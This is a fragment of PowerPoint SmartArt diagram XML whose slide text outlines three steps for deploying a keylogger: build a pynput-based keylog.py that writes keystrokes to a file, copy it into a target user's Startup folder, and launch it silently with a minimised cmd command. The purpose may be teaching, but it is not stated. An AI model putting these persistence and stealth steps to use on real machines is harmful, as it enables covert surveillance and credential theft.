    <dgm:pt modelId="{EF99FE8E-21C7-42BF-8276-BB0521F72E57}" type="pres">
      <dgm:prSet presAssocID="{9F974960-1C41-4170-89F5-DC39F857A0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365DBD4B-AC04-41E1-83C7-40EAB537CA7A}" type="pres">
      <dgm:prSet presAssocID="{9F974960-1C41-4170-89F5-DC39F857A040}" presName="iconSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{196D1023-5CC9-4624-9CAA-AB1488EB5C0A}" type="pres">
      <dgm:prSet presAssocID="{9F974960-1C41-4170-89F5-DC39F857A040}" presName="parTx" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{550A3456-1152-46D9-898D-CCA51FCABCED}" type="pres">
      <dgm:prSet presAssocID="{9F974960-1C41-4170-89F5-DC39F857A040}" presName="txSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{31393828-4A94-4D56-90FD-4D3FA6969BD1}" type="pres">
      <dgm:prSet presAssocID="{9F974960-1C41-4170-89F5-DC39F857A040}" presName="desTx" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{70A47E27-15B0-4536-8583-DBB0D4B9044D}" type="presOf" srcId="{A422B350-6283-41E5-AFAF-D8E4584C1278}" destId="{31393828-4A94-4D56-90FD-4D3FA6969BD1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{1B43CA40-91FE-4DA3-8D71-9752BD4C07F3}" srcId="{9F974960-1C41-4170-89F5-DC39F857A040}" destId="{A422B350-6283-41E5-AFAF-D8E4584C1278}" srcOrd="0" destOrd="0" parTransId="{E474FEFD-0B77-42ED-897B-F1FF729AD9C3}" sibTransId="{DD4F6AA4-CAC5-4F89-84ED-0D4F63D7323D}"/>
    <dgm:cxn modelId="{EDE32A45-FCC0-4058-B89A-D2EB42DB4EB2}" type="presOf" srcId="{44116EE5-ED27-483F-B5A0-37EA47C1B063}" destId="{0530AC03-97A1-40A4-BB60-95F79788777B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{8FCFF954-E779-49E1-BB9B-98BAC822A9AE}" type="presOf" srcId="{304A2DB8-E9F9-4591-BFB3-8F5369CF9580}" destId="{3AB7C1B2-083C-4211-8E6E-BAE42BD95EC8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{F54CBD82-D087-4B47-B8F4-16EF41EA0D82}" type="presOf" srcId="{3A1A59C5-508B-4D37-8970-86934CE8B063}" destId="{9D136766-8B73-4AC3-A32B-32A2F620FA20}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{C93337B0-F126-469F-9155-85D259332C2B}" srcId="{3A1A59C5-508B-4D37-8970-86934CE8B063}" destId="{304A2DB8-E9F9-4591-BFB3-8F5369CF9580}" srcOrd="0" destOrd="0" parTransId="{1255A902-60C2-4D3D-AD54-9F77CDE23982}" sibTransId="{15CE1D2F-C46C-4047-A7C1-0E3507832763}"/>
    <dgm:cxn modelId="{B6E552C5-270A-4154-AC3C-482F189B3C66}" type="presOf" srcId="{9F974960-1C41-4170-89F5-DC39F857A040}" destId="{196D1023-5CC9-4624-9CAA-AB1488EB5C0A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{DA4214C6-7774-477C-AAFF-6736C5B63846}" srcId="{304A2DB8-E9F9-4591-BFB3-8F5369CF9580}" destId="{44116EE5-ED27-483F-B5A0-37EA47C1B063}" srcOrd="0" destOrd="0" parTransId="{EF993A15-ECF6-4E52-95DE-CF522F71212D}" sibTransId="{F5C83A1A-3056-4851-AC6A-26729D5F5759}"/>
    <dgm:cxn modelId="{220807F3-CF90-4D74-91BD-B31266054754}" srcId="{3A1A59C5-508B-4D37-8970-86934CE8B063}" destId="{9F974960-1C41-4170-89F5-DC39F857A040}" srcOrd="1" destOrd="0" parTransId="{7477B173-0759-4495-B0C7-CCE36FDE439F}" sibTransId="{934DCF3A-DF7A-458A-B855-E21B6A2044DB}"/>
    <dgm:cxn modelId="{9CA194C6-CFCD-4D87-B8E9-A4A1A75F458F}" type="presParOf" srcId="{9D136766-8B73-4AC3-A32B-32A2F620FA20}" destId="{BA491D36-CA9D-4EB0-81E3-33934CE0A9DC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{A5756174-1065-4B01-9DFB-FD6986F5748A}" type="presParOf" srcId="{BA491D36-CA9D-4EB0-81E3-33934CE0A9DC}" destId="{C5336850-DBAC-4B94-BEB0-4F2942919D1D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{8793EC9E-9D5B-49BF-B346-CF23DD4EC734}" type="presParOf" srcId="{BA491D36-CA9D-4EB0-81E3-33934CE0A9DC}" destId="{0CE17BFB-33F3-4349-8F1E-CDD64B759A79}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{F5E0D0A0-C0EB-4023-B652-83C515924266}" type="presParOf" srcId="{BA491D36-CA9D-4EB0-81E3-33934CE0A9DC}" destId="{3AB7C1B2-083C-4211-8E6E-BAE42BD95EC8}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{319A800D-EAEC-4A5C-988F-8F5EE9360629}" type="presParOf" srcId="{BA491D36-CA9D-4EB0-81E3-33934CE0A9DC}" destId="{7296A0EA-12AA-42AF-9B14-96775FB23DE4}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{FC8079E8-1301-4540-A3AF-D3D208275289}" type="presParOf" srcId="{BA491D36-CA9D-4EB0-81E3-33934CE0A9DC}" destId="{0530AC03-97A1-40A4-BB60-95F79788777B}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{4BDFFDEA-1D39-4E3B-B963-F99EB030F03A}" type="presParOf" srcId="{9D136766-8B73-4AC3-A32B-32A2F620FA20}" destId="{7038B92C-2FC2-4789-B800-C6D176458155}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{77261993-89F7-41DB-934E-B2C89E8275C5}" type="presParOf" srcId="{9D136766-8B73-4AC3-A32B-32A2F620FA20}" destId="{FE1CD304-34E7-4C0E-99F4-0917B444065C}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{315824FE-ACC9-4C4A-B862-F8F2CFB1A7EE}" type="presParOf" srcId="{FE1CD304-34E7-4C0E-99F4-0917B444065C}" destId="{EF99FE8E-21C7-42BF-8276-BB0521F72E57}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{6CC6BC1B-7D48-4B49-A9DA-9E8AB3AC531D}" type="presParOf" srcId="{FE1CD304-34E7-4C0E-99F4-0917B444065C}" destId="{365DBD4B-AC04-41E1-83C7-40EAB537CA7A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{B7A82522-5F4A-4589-B48E-34FAF8618A8C}" type="presParOf" srcId="{FE1CD304-34E7-4C0E-99F4-0917B444065C}" destId="{196D1023-5CC9-4624-9CAA-AB1488EB5C0A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{50B056F2-670C-43A1-9090-D463E3622F57}" type="presParOf" srcId="{FE1CD304-34E7-4C0E-99F4-0917B444065C}" destId="{550A3456-1152-46D9-898D-CCA51FCABCED}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{15F43B32-5A9B-47F9-865F-D2545E5732E1}" type="presParOf" srcId="{FE1CD304-34E7-4C0E-99F4-0917B444065C}" destId="{31393828-4A94-4D56-90FD-4D3FA6969BD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1A59C5-508B-4D37-8970-86934CE8B063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4A2DB8-E9F9-4591-BFB3-8F5369CF958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>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Build the Payload</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1255A902-60C2-4D3D-AD54-9F77CDE23982}" type="parTrans" cxnId="{C93337B0-F126-469F-9155-85D259332C2B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{15CE1D2F-C46C-4047-A7C1-0E3507832763}" type="sibTrans" cxnId="{C93337B0-F126-469F-9155-85D259332C2B}">
      <dgm:prSet phldrT="1" phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{44116EE5-ED27-483F-B5A0-37EA47C1B06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accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Use keylog.py ( </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" err="1">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>pynput</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>-based ) → logs keystrokes to key.txt.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EF993A15-ECF6-4E52-95DE-CF522F71212D}" type="parTrans" cxnId="{DA4214C6-7774-477C-AAFF-6736C5B63846}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F5C83A1A-3056-4851-AC6A-26729D5F5759}" type="sibTrans" cxnId="{DA4214C6-7774-477C-AAFF-6736C5B63846}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9F974960-1C41-4170-89F5-DC39F857A04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>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Stage on Target</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7477B173-0759-4495-B0C7-CCE36FDE439F}" type="parTrans" cxnId="{220807F3-CF90-4D74-91BD-B31266054754}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{934DCF3A-DF7A-458A-B855-E21B6A2044DB}" type="sibTrans" cxnId="{220807F3-CF90-4D74-91BD-B31266054754}">
      <dgm:prSet phldrT="2" phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A422B350-6283-41E5-AFAF-D8E4584C127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accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Copy keylog.py into the user’s Startup folder.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E474FEFD-0B77-42ED-897B-F1FF729AD9C3}" type="parTrans" cxnId="{1B43CA40-91FE-4DA3-8D71-9752BD4C07F3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DD4F6AA4-CAC5-4F89-84ED-0D4F63D7323D}" type="sibTrans" cxnId="{1B43CA40-91FE-4DA3-8D71-9752BD4C07F3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2363137F-427B-4BFC-BBDB-CFB2B974C39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0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Batch script runs:</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-GB" b="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="en-GB" b="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t> start /min </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" b="0" err="1">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>cmd</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" b="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t> /c "cd %APPDATA%\\…\\Startup &amp; python keylog.py"</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="0">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Grandview Display"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{804DFFDE-6B4D-472E-B9B9-501AB22CAD1F}" type="parTrans" cxnId="{60DD6EA8-06C5-456A-9579-80F073E3393F}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8C2F77F4-3A3B-4D29-98B4-A2A57B49A51F}" type="sibTrans" cxnId="{60DD6EA8-06C5-456A-9579-80F073E3393F}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0D6AC8DC-9D0A-425E-AC9C-A84EE1536164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>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Silent Launch</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Grandview Display"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F0F07CE7-1D0F-4CF6-B2E6-D22B7F623CD9}" type="parTrans" cxnId="{19810002-1497-4D5D-9271-DCBD4317129F}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E26C04A7-9874-4348-A830-604D985EF057}" type="sibTrans" cxnId="{19810002-1497-4D5D-9271-DCBD4317129F}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9D136766-8B73-4AC3-A32B-32A2F620FA20}" type="pres">
      <dgm:prSet presAssocID="{3A1A59C5-508B-4D37-8970-86934CE8B063}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BA491D36-CA9D-4EB0-81E3-33934CE0A9DC}" type="pres">
      <dgm:prSet presAssocID="{304A2DB8-E9F9-4591-BFB3-8F5369CF9580}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C5336850-DBAC-4B94-BEB0-4F2942919D1D}" type="pres">
      <dgm:prSet presAssocID="{304A2DB8-E9F9-4591-BFB3-8F5369CF95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 with solid fill"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{0CE17BFB-33F3-4349-8F1E-CDD64B759A79}" type="pres">
      <dgm:prSet presAssocID="{304A2DB8-E9F9-4591-BFB3-8F5369CF9580}" presName="iconSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3AB7C1B2-083C-4211-8E6E-BAE42BD95EC8}" type="pres">
      <dgm:prSet presAssocID="{304A2DB8-E9F9-4591-BFB3-8F5369CF9580}" presName="parTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7296A0EA-12AA-42AF-9B14-96775FB23DE4}" type="pres">
      <dgm:prSet presAssocID="{304A2DB8-E9F9-4591-BFB3-8F5369CF9580}" presName="txSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0530AC03-97A1-40A4-BB60-95F79788777B}" type="pres">
      <dgm:prSet presAssocID="{304A2DB8-E9F9-4591-BFB3-8F5369CF9580}" presName="desTx" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="6">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7038B92C-2FC2-4789-B800-C6D176458155}" type="pres">
      <dgm:prSet presAssocID="{15CE1D2F-C46C-4047-A7C1-0E3507832763}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FE1CD304-34E7-4C0E-99F4-0917B444065C}" type="pres">
      <dgm:prSet presAssocID="{9F974960-1C41-4170-89F5-DC39F857A040}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EF99FE8E-21C7-42BF-8276-BB0521F72E57}" type="pres">
      <dgm:prSet presAssocID="{9F974960-1C41-4170-89F5-DC39F857A0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with solid fill"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{365DBD4B-AC04-41E1-83C7-40EAB537CA7A}" type="pres">
      <dgm:prSet presAssocID="{9F974960-1C41-4170-89F5-DC39F857A040}" presName="iconSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{196D1023-5CC9-4624-9CAA-AB1488EB5C0A}" type="pres">
      <dgm:prSet presAssocID="{9F974960-1C41-4170-89F5-DC39F857A040}" presName="parTx" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{550A3456-1152-46D9-898D-CCA51FCABCED}" type="pres">
      <dgm:prSet presAssocID="{9F974960-1C41-4170-89F5-DC39F857A040}" presName="txSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{31393828-4A94-4D56-90FD-4D3FA6969BD1}" type="pres">
      <dgm:prSet presAssocID="{9F974960-1C41-4170-89F5-DC39F857A040}" presName="desTx" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="6">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FDD3DE48-E3C9-4468-93B9-0E7D0D444006}" type="pres">
      <dgm:prSet presAssocID="{934DCF3A-DF7A-458A-B855-E21B6A2044DB}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5755CDCF-9904-42AD-BE86-54B79A0DB95E}" type="pres">
      <dgm:prSet presAssocID="{0D6AC8DC-9D0A-425E-AC9C-A84EE1536164}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5F7A57D2-DE20-4FCB-B9B3-97B3911F0941}" type="pres">
      <dgm:prSet presAssocID="{0D6AC8DC-9D0A-425E-AC9C-A84EE1536164}" presName="iconRect" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{57D6804C-477A-4F4B-94C9-AAEB8667A7C8}" type="pres">
      <dgm:prSet presAssocID="{0D6AC8DC-9D0A-425E-AC9C-A84EE1536164}" presName="iconSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9A7B1654-6854-4B4C-BA96-AA806E9A3C51}" type="pres">
      <dgm:prSet presAssocID="{0D6AC8DC-9D0A-425E-AC9C-A84EE1536164}" presName="parTx" presStyleLbl="revTx" presStyleIdx="4" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{95B73724-9110-4117-AC09-BB521FF10F36}" type="pres">
      <dgm:prSet presAssocID="{0D6AC8DC-9D0A-425E-AC9C-A84EE1536164}" presName="txSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EC6924BF-E1BF-4CBF-8F5B-4858C0C27865}" type="pres">
      <dgm:prSet presAssocID="{0D6AC8DC-9D0A-425E-AC9C-A84EE1536164}" presName="desTx" presStyleLbl="revTx" presStyleIdx="5" presStyleCnt="6">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{19810002-1497-4D5D-9271-DCBD4317129F}" srcId="{3A1A59C5-508B-4D37-8970-86934CE8B063}" destId="{0D6AC8DC-9D0A-425E-AC9C-A84EE1536164}" srcOrd="2" destOrd="0" parTransId="{F0F07CE7-1D0F-4CF6-B2E6-D22B7F623CD9}" sibTransId="{E26C04A7-9874-4348-A830-604D985EF057}"/>
    <dgm:cxn modelId="{1B43CA40-91FE-4DA3-8D71-9752BD4C07F3}" srcId="{9F974960-1C41-4170-89F5-DC39F857A040}" destId="{A422B350-6283-41E5-AFAF-D8E4584C1278}" srcOrd="0" destOrd="0" parTransId="{E474FEFD-0B77-42ED-897B-F1FF729AD9C3}" sibTransId="{DD4F6AA4-CAC5-4F89-84ED-0D4F63D7323D}"/>
    <dgm:cxn modelId="{B674EE5E-8D3D-4CDE-B568-36BD0C0730EF}" type="presOf" srcId="{9F974960-1C41-4170-89F5-DC39F857A040}" destId="{196D1023-5CC9-4624-9CAA-AB1488EB5C0A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{172FF742-0F6C-456F-BE5B-532DB7B683E3}" type="presOf" srcId="{304A2DB8-E9F9-4591-BFB3-8F5369CF9580}" destId="{3AB7C1B2-083C-4211-8E6E-BAE42BD95EC8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{41FD7356-4962-4515-A27C-4C12A8AA33BF}" type="presOf" srcId="{2363137F-427B-4BFC-BBDB-CFB2B974C395}" destId="{EC6924BF-E1BF-4CBF-8F5B-4858C0C27865}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{F54CBD82-D087-4B47-B8F4-16EF41EA0D82}" type="presOf" srcId="{3A1A59C5-508B-4D37-8970-86934CE8B063}" destId="{9D136766-8B73-4AC3-A32B-32A2F620FA20}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{60DD6EA8-06C5-456A-9579-80F073E3393F}" srcId="{0D6AC8DC-9D0A-425E-AC9C-A84EE1536164}" destId="{2363137F-427B-4BFC-BBDB-CFB2B974C395}" srcOrd="0" destOrd="0" parTransId="{804DFFDE-6B4D-472E-B9B9-501AB22CAD1F}" sibTransId="{8C2F77F4-3A3B-4D29-98B4-A2A57B49A51F}"/>
    <dgm:cxn modelId="{C93337B0-F126-469F-9155-85D259332C2B}" srcId="{3A1A59C5-508B-4D37-8970-86934CE8B063}" destId="{304A2DB8-E9F9-4591-BFB3-8F5369CF9580}" srcOrd="0" destOrd="0" parTransId="{1255A902-60C2-4D3D-AD54-9F77CDE23982}" sibTransId="{15CE1D2F-C46C-4047-A7C1-0E3507832763}"/>
    <dgm:cxn modelId="{1EF427B1-FDA0-478E-8C2D-5C3EF8A5690F}" type="presOf" srcId="{A422B350-6283-41E5-AFAF-D8E4584C1278}" destId="{31393828-4A94-4D56-90FD-4D3FA6969BD1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{DA4214C6-7774-477C-AAFF-6736C5B63846}" srcId="{304A2DB8-E9F9-4591-BFB3-8F5369CF9580}" destId="{44116EE5-ED27-483F-B5A0-37EA47C1B063}" srcOrd="0" destOrd="0" parTransId="{EF993A15-ECF6-4E52-95DE-CF522F71212D}" sibTransId="{F5C83A1A-3056-4851-AC6A-26729D5F5759}"/>
    <dgm:cxn modelId="{220807F3-CF90-4D74-91BD-B31266054754}" srcId="{3A1A59C5-508B-4D37-8970-86934CE8B063}" destId="{9F974960-1C41-4170-89F5-DC39F857A040}" srcOrd="1" destOrd="0" parTransId="{7477B173-0759-4495-B0C7-CCE36FDE439F}" sibTransId="{934DCF3A-DF7A-458A-B855-E21B6A2044DB}"/>
    <dgm:cxn modelId="{CA4795F7-836F-4CCC-9E5A-57D800A9EB53}" type="presOf" srcId="{0D6AC8DC-9D0A-425E-AC9C-A84EE1536164}" destId="{9A7B1654-6854-4B4C-BA96-AA806E9A3C51}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{1A0479F9-310D-4E93-829A-6C6DC0B13947}" type="presOf" srcId="{44116EE5-ED27-483F-B5A0-37EA47C1B063}" destId="{0530AC03-97A1-40A4-BB60-95F79788777B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
